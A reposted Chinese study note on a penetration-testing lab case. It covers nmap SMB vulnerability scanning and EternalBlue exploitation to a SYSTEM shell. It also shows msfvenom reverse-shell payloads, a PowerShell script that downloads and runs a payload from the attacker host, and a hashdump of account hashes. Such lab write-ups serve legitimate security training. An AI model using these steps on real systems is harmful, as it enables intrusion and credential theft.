渗透测试学习笔记之案例一

admin

转自：http://avfisher.win/archives/741

0x00 前言

很久没有更新博客了，主要是因为工作很忙，写博客也太耗时间了。但是突然发现，许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章，也可以认为是学习笔记吧，留作日后的技术积累和参考吧。

0x01 案列分析

实验环境：

• 目标靶机：10.11.1.0/24
  

• 攻击机：Kali Linux (10.11.0.79)
  

信息收集：

扫描存在smb服务的主机：

1. # nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt
   
2. # cat smb_service.txt | grep -i windows | cut -d" " -f2
   
3. 10.11.1.5
   
4. 10.11.1.31
   
5. 10.11.1.49
   
6. 10.11.1.50
   
7. 10.11.1.73
   
8. 10.11.1.128
   
9. 10.11.1.145
   
10. 10.11.1.202
    
11. 10.11.1.218
    
12. 10.11.1.220
    
13. 10.11.1.223
    
14. 10.11.1.227
    
15. 10.11.1.229
    
16. 10.11.1.230
    
17. # cat smb_service.txt | grep -i open | cut -d" " -f2 > smb_server_all.txt

复制代码

扫描存在smb漏洞的主机：

1. # find / -name smb*vuln*.nse
   
2. /usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
   
3. /usr/share/nmap/scripts/smb-vuln-ms06-025.nse
   
4. /usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
   
5. /usr/share/nmap/scripts/smb-vuln-ms07-029.nse
   
6. /usr/share/nmap/scripts/smb-vuln-ms17-010.nse
   
7. /usr/share/nmap/scripts/smb-vuln-conficker.nse
   
8. /usr/share/nmap/scripts/smb-vuln-ms08-067.nse
   
9. /usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
   
10. /usr/share/nmap/scripts/smb-vuln-ms10-054.nse
    
11. /usr/share/nmap/scripts/smb-vuln-ms10-061.nse
    
12. # for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done
    
13. # cat smb_vulns_smb-vuln-*.txt | grep IDs:
    
14. |     IDs:  CVE:CVE-2009-3103
    
15. |     IDs:  CVE:CVE-2009-3103
    
16. |     IDs:  CVE:CVE-2009-3103
    
17. |     IDs:  CVE:CVE-2009-3103
    
18. |     IDs:  CVE:CVE-2017-0143
    
19. |     IDs:  CVE:CVE-2017-0143
    
20. |     IDs:  CVE:CVE-2017-0143
    
21. |     IDs:  CVE:CVE-2017-0143
    
22. |     IDs:  CVE:CVE-2017-0143
    
23. |     IDs:  CVE:CVE-2017-0143
    
24. |     IDs:  CVE:CVE-2017-0143
    
25. |     IDs:  CVE:CVE-2017-0143
    
26. |     IDs:  CVE:CVE-2017-0143
    
27. |     IDs:  CVE:CVE-2017-0143
    
28. |     IDs:  CVE:CVE-2017-0143
    
29. |     IDs:  CVE:CVE-2017-0143
    
30. |     IDs:  CVE:CVE-2017-0143

复制代码

漏洞利用：

检查并验证存在smb ms17-010漏洞的主机：

1. # cat ../scripts/smb_vulns_smb-vuln-ms17-010.nse.txt
   
2. # Nmap 7.50 scan initiated Mon Jul  3 13:57:06 2017 as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt
   
3. Nmap scan report for 10.11.1.5
   
4. Host is up (0.24s latency).
   
5. 
   
6. PORT    STATE SERVICE
   
7. 139/tcp open  netbios-ssn
   
8. 445/tcp open  microsoft-ds
   
9. MAC Address: 00:50:56:89:35:AF (VMware)
   
10. 
    
11. Host script results:
    
12. | smb-vuln-ms17-010:
    
13. |   VULNERABLE:
    
14. |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    
15. |     State: VULNERABLE
    
16. |     IDs:  CVE:CVE-2017-0143
    
17. |     Risk factor: HIGH
    
18. |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    
19. |        servers (ms17-010).
    
20. |      
    
21. |     Disclosure date: 2017-03-14
    
22. |     References:
    
23. |       [url]https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/[/url]
    
24. |       [url]https://technet.microsoft.com/en-us/library/security/ms17-010.aspx[/url]
    
25. |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143[/url]
    
26. 
    
27. ... ...
    
28. 
    
29. Nmap scan report for 10.11.1.220
    
30. Host is up (0.24s latency).
    
31. 
    
32. PORT    STATE SERVICE
    
33. 139/tcp open  netbios-ssn
    
34. 445/tcp open  microsoft-ds
    
35. MAC Address: 00:50:56:89:15:14 (VMware)
    
36. 
    
37. Host script results:
    
38. | smb-vuln-ms17-010:
    
39. |   VULNERABLE:
    
40. |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    
41. |     State: VULNERABLE
    
42. |     IDs:  CVE:CVE-2017-0143
    
43. |     Risk factor: HIGH
    
44. |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    
45. |        servers (ms17-010).
    
46. |      
    
47. |     Disclosure date: 2017-03-14
    
48. |     References:
    
49. |       [url]https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/[/url]
    
50. |       [url]https://technet.microsoft.com/en-us/library/security/ms17-010.aspx[/url]
    
51. |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143[/url]
    
52. 
    
53. ... ...
    
54. 
    
55. Nmap scan report for 10.11.1.230
    
56. Host is up (0.25s latency).
    
57. 
    
58. PORT    STATE SERVICE
    
59. 139/tcp open  netbios-ssn
    
60. 445/tcp open  microsoft-ds
    
61. MAC Address: 00:50:56:89:5C:19 (VMware)
    
62. 
    
63. Host script results:
    
64. | smb-vuln-ms17-010:
    
65. |   VULNERABLE:
    
66. |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    
67. |     State: VULNERABLE
    
68. |     IDs:  CVE:CVE-2017-0143
    
69. |     Risk factor: HIGH
    
70. |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    
71. |        servers (ms17-010).
    
72. |      
    
73. |     Disclosure date: 2017-03-14
    
74. |     References:
    
75. |       [url]https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/[/url]
    
76. |       [url]https://technet.microsoft.com/en-us/library/security/ms17-010.aspx[/url]
    
77. |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143[/url]
    
78. 
    
79. Read data files from: /usr/bin/../share/nmap
    
80. # Nmap done at Mon Jul  3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds

复制代码

IP: 10.11.1.5 利用失败

1. msf > use exploit/windows/smb/ms17_010_eternalblue  
   
2. msf exploit(ms17_010_eternalblue) > show options   
   
3. 
   
4. Module options (exploit/windows/smb/ms17_010_eternalblue):                                             
   
5. 
   
6.    Name                Current Setting  Required  Description                                          
   
7.    ----                ---------------  --------  -----------                                          
   
8.    GroomAllocations    12               yes       Initial number of times to groom the kernel pool.     
   
9.    GroomDelta          5                yes       The amount to increase the groom count by per try.   
   
10.    MaxExploitAttempts  3                yes       The number of times to retry the exploit.            
    
11.    ProcessName         spoolsv.exe      yes       Process to inject payload into.                       
    
12.    RHOST                                yes       The target address                                    
    
13.    RPORT               445              yes       The target port (TCP)                                 
    
14.    SMBDomain           .                no        (Optional) The Windows domain to use for authentication
    
15.    SMBPass                              no        (Optional) The password for the specified username   
    
16.    SMBUser                              no        (Optional) The username to authenticate as            
    
17.    VerifyArch          true             yes       Check if remote architecture matches exploit Target.  
    
18.    VerifyTarget        true             yes       Check if remote OS matches exploit Target.            
    
19. 
    
20. 
    
21. Exploit target:           
    
22. 
    
23.    Id  Name               
    
24.    --  ----               
    
25.    0   Windows 7 and Server 2008 R2 (x64) All Service Packs   
    
26. msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.5
    
27. RHOST => 10.11.1.5
    
28. msf exploit(ms17_010_eternalblue) > exploit
    
29. 
    
30. [*] Started reverse TCP handler on 10.11.0.79:4444
    
31. [*] 10.11.1.5:445 - Connecting to target for exploitation.
    
32. [+] 10.11.1.5:445 - Connection established for exploitation.
    
33. [!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply
    
34. [!] 10.11.1.5:445 - Disable VerifyTarget option to proceed manually...
    
35. [-] 10.11.1.5:445 - Unable to continue with improper OS Target.
    
36. [*] Exploit completed, but no session was created.

复制代码

IP: 10.11.1.230 同样地，利用失败了

1. msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.230
   
2. RHOST => 10.11.1.230
   
3. msf exploit(ms17_010_eternalblue) > exploit
   
4. 
   
5. [*] Started reverse TCP handler on 10.11.0.79:4444
   
6. [*] 10.11.1.230:445 - Connecting to target for exploitation.
   
7. [+] 10.11.1.230:445 - Connection established for exploitation.
   
8. [+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply
   
9. [*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes)
   
10. [*] 10.11.1.230:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
    
11. [*] 10.11.1.230:445 - 0x00000010  74 65 20 4e 20 37 36 30 30                       te N 7600      
    
12. [!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
    
13. [!] 10.11.1.230:445 - Disable VerifyArch option to proceed manually...
    
14. [-] 10.11.1.230:445 - Unable to continue with improper OS Arch.
    
15. [*] Exploit completed, but no session was created.

复制代码

IP: 10.11.1.220 成功利用并反弹了一个shell回来

1. msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.220
   
2. RHOST => 10.11.1.220
   
3. msf exploit(ms17_010_eternalblue) > exploit
   
4. 
   
5. [*] Started reverse TCP handler on 10.11.0.79:4444
   
6. [*] 10.11.1.220:445 - Connecting to target for exploitation.
   
7. [+] 10.11.1.220:445 - Connection established for exploitation.
   
8. [+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
   
9. [*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
   
10. [*] 10.11.1.220:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
    
11. [*] 10.11.1.220:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
    
12. [*] 10.11.1.220:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
    
13. [*] 10.11.1.220:445 - 0x00000030  6b 20 31                                         k 1            
    
14. [+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    
15. [*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
    
16. [*] 10.11.1.220:445 - Sending all but last fragment of exploit packet
    
17. [*] 10.11.1.220:445 - Starting non-paged pool grooming
    
18. [+] 10.11.1.220:445 - Sending SMBv2 buffers
    
19. [+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    
20. [*] 10.11.1.220:445 - Sending final SMBv2 buffers.
    
21. [*] 10.11.1.220:445 - Sending last fragment of exploit packet!
    
22. [*] 10.11.1.220:445 - Receiving response from exploit packet
    
23. [+] 10.11.1.220:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    
24. [*] 10.11.1.220:445 - Sending egg to corrupted connection.
    
25. [*] 10.11.1.220:445 - Triggering free of corrupted buffer.
    
26. [*] Command shell session 1 opened (10.11.0.79:4444 -> 10.11.1.220:62009) at 2017-07-04 03:08:40 -0400
    
27. [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
28. [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
29. [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
30. 
    
31. Microsoft Windows [Version 6.1.7601]
    
32. Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
33. 
    
34. C:Windowssystem32>whoami
    
35. whoami
    
36. nt authoritysystem

复制代码

后渗透利用：

在上一步中我们成功地从IP：10.11.1.220上反弹了一个shell回来，但很显然这不是一个完美的交互式的shell且不稳定可靠，那么接下来我们该怎么办呢？首先，我们想到的是获得一个功能更加强大且稳定可靠的meterpreter。

检查目标系统的操作系统版本：

1. C:Windowssystem32>dir c:      
   
2. dir c:
   
3. Volume in drive C has no label.
   
4. Volume Serial Number is A49A-E592
   
5. 
   
6. Directory of c:
   
7. 
   
8. 12/27/2013  11:37 PM              Ftp Root
   
9. 07/13/2009  07:20 PM              PerfLogs
   
10. 12/28/2013  02:15 AM              Program Files
    
11. 12/28/2013  10:03 PM              Program Files (x86)
    
12. 12/27/2013  11:37 PM              temp
    
13. 08/02/2012  01:59 PM              Users
    
14. 12/27/2013  11:37 PM              Windows
    
15.                0 File(s)              0 bytes
    
16.                7 Dir(s)  28,860,628,992 bytes free

复制代码

显然目标系统是一个64位的Windows server 2008的服务器。

接下来，生成一个64位windows的meterpreter payload：

1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x64 --platform win -o mp_64.exe

复制代码

注：32位的windows的meterpreter payload：

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o mp_86.exe

复制代码

上传meterpreter payload (mp_64.exe) 至攻击机的web目录中(/var/www/html/payload)以便目标机可以通过http链接来下载它。

重新开启一个msfconsole并开启监听。

1. msf > use exploit/multi/handler
   
2. msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
   
3. payload => windows/x64/meterpreter/reverse_tcp
   
4. msf exploit(handler) > show options
   
5. 
   
6. Module options (exploit/multi/handler):
   
7. 
   
8.    Name  Current Setting  Required  Description
   
9.    ----  ---------------  --------  -----------
   
10. 
    
11. 
    
12. Payload options (windows/x64/meterpreter/reverse_tcp):
    
13. 
    
14.    Name      Current Setting  Required  Description
    
15.    ----      ---------------  --------  -----------
    
16.    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    
17.    LHOST                      yes       The listen address
    
18.    LPORT     4444             yes       The listen port
    
19. 
    
20. 
    
21. Exploit target:
    
22. 
    
23.    Id  Name
    
24.    --  ----
    
25.    0   Wildcard Target
    
26. 
    
27. 
    
28. msf exploit(handler) > set LHOST 10.11.0.79
    
29. LHOST => 10.11.0.79
    
30. msf exploit(handler) > set LPORT 8080
    
31. LPORT => 8080
    
32. msf exploit(handler) > run
    
33. 
    
34. [*] Started reverse TCP handler on 10.11.0.79:8080
    
35. [*] Starting the payload handler...

复制代码

利用反弹的shell创建用于下载我们准备好的meterpreter payload的powershell脚本，然后执行脚本下载payload（mp_64.exe）并执行。

1. c:UsersAdministratorDesktop>echo $storageDir=$pwd > wget.ps1
   
2. echo $storageDir=$pwd > wget.ps1
   
3. 
   
4. c:UsersAdministratorDesktop>echo $webclient=New-Object System.Net.WebClient >>wget.ps1
   
5. echo $webclient=New-Object System.Net.WebClient >>wget.ps1
   
6. 
   
7. c:UsersAdministratorDesktop>echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1     
   
8. echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1
   
9. 
   
10. c:UsersAdministratorDesktop>echo $file="mp_64.exe" >>wget.ps1
    
11. echo $file="mp_64.exe" >>wget.ps1
    
12. 
    
13. c:UsersAdministratorDesktop>echo $webclient.DownloadFile($url,$file) >>wget.ps1
    
14. echo $webclient.DownloadFile($url,$file) >>wget.ps1
    
15. 
    
16. c:UsersAdministratorDesktop>type wget.ps1
    
17. type wget.ps1
    
18. $storageDir=$pwd
    
19. $webclient=New-Object System.Net.WebClient
    
20. $url="http://10.11.0.79/payload/mp_64.exe"
    
21. $file="mp_64.exe"
    
22. $webclient.DownloadFile($url,$file)
    
23. 
    
24. c:UsersAdministratorDesktop>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
    
25. powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1  
    
26. 
    
27. c:UsersAdministratorDesktop>mp_64.exe

复制代码

至此，我们成功地获得了一个功能强大的meterpreter，并可以很容易去dump hash为更进一步的渗透做准备。

1. msf exploit(handler) > exploit
   
2. 
   
3. [*] Started reverse TCP handler on 10.11.0.79:8080
   
4. [*] Starting the payload handler...
   
5. [*] Sending stage (1189423 bytes) to 10.11.1.220
   
6. [*] Meterpreter session 1 opened (10.11.0.79:8080 -> 10.11.1.220:49326) at 2017-08-09 03:57:36 -0400
   
7. 
   
8. meterpreter > help
   
9. Core Commands
   
10. =============
    
11. 
    
12.     Command                   Description
    
13.     -------                   -----------
    
14.     ?                         Help menu
    
15.     background                Backgrounds the current session
    
16.     bgkill                    Kills a background meterpreter script
    
17.     bglist                    Lists running background scripts
    
18.     bgrun                     Executes a meterpreter script as a background thread
    
19.     channel                   Displays information or control active channels
    
20.     close                     Closes a channel
    
21.     disable_unicode_encoding  Disables encoding of unicode strings
    
22.     enable_unicode_encoding   Enables encoding of unicode strings
    
23.     exit                      Terminate the meterpreter session
    
24.     get_timeouts              Get the current session timeout values
    
25.     help                      Help menu
    
26.     info                      Displays information about a Post module
    
27.     irb                       Drop into irb scripting mode
    
28.     load                      Load one or more meterpreter extensions
    
29.     machine_id                Get the MSF ID of the machine attached to the session
    
30.     migrate                   Migrate the server to another process
    
31.     quit                      Terminate the meterpreter session
    
32.     read                      Reads data from a channel
    
33.     resource                  Run the commands stored in a file
    
34.     run                       Executes a meterpreter script or Post module
    
35.     sessions                  Quickly switch to another session
    
36.     set_timeouts              Set the current session timeout values
    
37.     sleep                     Force Meterpreter to go quiet, then re-establish session.
    
38.     transport                 Change the current transport mechanism
    
39.     use                       Deprecated alias for 'load'
    
40.     uuid                      Get the UUID for the current session
    
41.     write                     Writes data to a channel
    
42. 
    
43. 
    
44. Stdapi: File system Commands
    
45. ============================
    
46. 
    
47.     Command       Description
    
48.     -------       -----------
    
49.     cat           Read the contents of a file to the screen
    
50.     cd            Change directory
    
51.     checksum      Retrieve the checksum of a file
    
52.     cp            Copy source to destination
    
53.     dir           List files (alias for ls)
    
54.     download      Download a file or directory
    
55.     edit          Edit a file
    
56.     getlwd        Print local working directory
    
57.     getwd         Print working directory
    
58.     lcd           Change local working directory
    
59.     lpwd          Print local working directory
    
60.     ls            List files
    
61.     mkdir         Make directory
    
62.     mv            Move source to destination
    
63.     pwd           Print working directory
    
64.     rm            Delete the specified file
    
65.     rmdir         Remove directory
    
66.     search        Search for files
    
67.     show_mount    List all mount points/logical drives
    
68.     upload        Upload a file or directory
    
69. 
    
70. 
    
71. Stdapi: Networking Commands
    
72. ===========================
    
73. 
    
74.     Command       Description
    
75.     -------       -----------
    
76.     arp           Display the host ARP cache
    
77.     getproxy      Display the current proxy configuration
    
78.     ifconfig      Display interfaces
    
79.     ipconfig      Display interfaces
    
80.     netstat       Display the network connections
    
81.     portfwd       Forward a local port to a remote service
    
82.     resolve       Resolve a set of host names on the target
    
83.     route         View and modify the routing table
    
84. 
    
85. 
    
86. Stdapi: System Commands
    
87. =======================
    
88. 
    
89.     Command       Description
    
90.     -------       -----------
    
91.     clearev       Clear the event log
    
92.     drop_token    Relinquishes any active impersonation token.
    
93.     execute       Execute a command
    
94.     getenv        Get one or more environment variable values
    
95.     getpid        Get the current process identifier
    
96.     getprivs      Attempt to enable all privileges available to the current process
    
97.     getsid        Get the SID of the user that the server is running as
    
98.     getuid        Get the user that the server is running as
    
99.     kill          Terminate a process
    
100.     localtime     Displays the target system's local date and time
     
101.     pgrep         Filter processes by name
     
102.     pkill         Terminate processes by name
     
103.     ps            List running processes
     
104.     reboot        Reboots the remote computer
     
105.     reg           Modify and interact with the remote registry
     
106.     rev2self      Calls RevertToSelf() on the remote machine
     
107.     shell         Drop into a system command shell
     
108.     shutdown      Shuts down the remote computer
     
109.     steal_token   Attempts to steal an impersonation token from the target process
     
110.     suspend       Suspends or resumes a list of processes
     
111.     sysinfo       Gets information about the remote system, such as OS
     
112. 
     
113. 
     
114. Stdapi: User interface Commands
     
115. ===============================
     
116. 
     
117.     Command        Description
     
118.     -------        -----------
     
119.     enumdesktops   List all accessible desktops and window stations
     
120.     getdesktop     Get the current meterpreter desktop
     
121.     idletime       Returns the number of seconds the remote user has been idle
     
122.     keyscan_dump   Dump the keystroke buffer
     
123.     keyscan_start  Start capturing keystrokes
     
124.     keyscan_stop   Stop capturing keystrokes
     
125.     screenshot     Grab a screenshot of the interactive desktop
     
126.     setdesktop     Change the meterpreters current desktop
     
127.     uictl          Control some of the user interface components
     
128. 
     
129. 
     
130. Stdapi: Webcam Commands
     
131. =======================
     
132. 
     
133.     Command        Description
     
134.     -------        -----------
     
135.     record_mic     Record audio from the default microphone for X seconds
     
136.     webcam_chat    Start a video chat
     
137.     webcam_list    List webcams
     
138.     webcam_snap    Take a snapshot from the specified webcam
     
139.     webcam_stream  Play a video stream from the specified webcam
     
140. 
     
141. 
     
142. Priv: Elevate Commands
     
143. ======================
     
144. 
     
145.     Command       Description
     
146.     -------       -----------
     
147.     getsystem     Attempt to elevate your privilege to that of local system.
     
148. 
     
149. 
     
150. Priv: Password database Commands
     
151. ================================
     
152. 
     
153.     Command       Description
     
154.     -------       -----------
     
155.     hashdump      Dumps the contents of the SAM database
     
156. 
     
157. 
     
158. Priv: Timestomp Commands
     
159. ========================
     
160. 
     
161.     Command       Description
     
162.     -------       -----------
     
163.     timestomp     Manipulate file MACE attributes
     
164. meterpreter > screenshot
     
165. meterpreter > hashdump
     
166. Administrator:500:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e:::
     
167. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
     
168. krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bca55919186bf4443840164612ce9f77:::
     
169. kevin:1106:aad3b435b51404eeaad3b435b51404ee:aef3d57f355a02297fc386630a01449e:::
     
170. robert:1110:aad3b435b51404eeaad3b435b51404ee:0d3f32016ee8a42ba768d558875d57e5:::
     
171. avfisher:1120:aad3b435b51404eeaad3b435b51404ee:ef28083240cb79a25adb4290ce6cb67b:::
     
172. MASTER$:1000:aad3b435b51404eeaad3b435b51404ee:e0a6ad80117cbe539c459dafc5291f27:::
     
173. SLAVE$:1103:aad3b435b51404eeaad3b435b51404ee:789cf984d53d9616fca933d37e974209:::
     
174. OBSERVER$:1111:aad3b435b51404eeaad3b435b51404ee:d60552ce7c9dc4fabdf0ba4e5fc46f69:::

复制代码

0x03 小结

总结一下本案例中的渗透思路：

• 利用nmap批量扫描开放smb服务端口的主机
• 利用nmap扫描存在smb漏洞的服务主机
• 利用ms17-010验证和攻击目标主机并反弹shell
• 制作更加稳定可靠的meterpreter payload
• 利用powershell脚本下载meterpreter并执行
• 获得meterpreter为进一步渗透做准备